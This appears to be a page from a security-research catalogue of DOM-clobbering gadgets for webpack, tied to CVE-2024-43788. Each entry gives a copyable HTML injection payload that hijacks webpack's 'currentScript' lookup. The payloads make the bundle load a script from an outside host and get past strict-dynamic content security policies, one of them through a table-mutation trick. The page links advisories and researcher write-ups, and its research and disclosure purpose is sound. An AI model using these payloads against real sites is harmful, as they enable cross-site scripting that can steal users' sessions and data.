.. / webpack

Star Fork

Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset.

Latest

<img> <script> @name @src 🛡️ strict-dynamic 🛡️ unsafe-eval ⏱️ before-load

• It is possible to take part of the fix for CVE-2024-43788 which uses the src= of the last <script> tag of the page to load additionnal modules. As with the CVE, it is mandatory to have the AutoPublicPathRuntimeModule enabled.
  
  For this to work, the user input must be placed above the bundle script tag. We then use a trick use table HTML mutation to make it follow down the DOM tree. This ensures that when Webpack loads, our script is already in the DOM and positioned below it, something that normally shouldn’t be possible, since the page stops loading while a script is being executed.

  <!-- user input -->
  <img name="currentScript"><table>
  <script src="https://gmsgadget.com/assets/xss/index.js"></script>
  
  <div>
  <script nonce="secret" src="/assets/libs/webpack/bundle.js"></script>
  </div>

  Preview Copy

Related links:

• https://mizu.re/post/heroctf-v6-writeups#underConstruction-gadget-webpack-domclobbering

Found by @kevin_mizu.

≤5.92.1 | CVE-2024-43788

<img> <script> @name @src 🛡️ unsafe-eval 🛡️ strict-dynamic ⏱️ before-load

• It is mandatory to have the AutoPublicPathRuntimeModule enabled.

  <!-- user input -->
  <img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
  
  <script nonce="secret" src="/assets/libs/webpack/5.92.1/bundle.js"></script>

  Preview Copy

Related links:

• https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986
• https://github.com/jackfromeast/dom-clobbering-collection/blob/main/domc-gadgets/webpack.md
• https://jackfromeast.github.io/assets/DOMinoEffect.pdf

Found by jackfromeast, ishmeals.

Source | History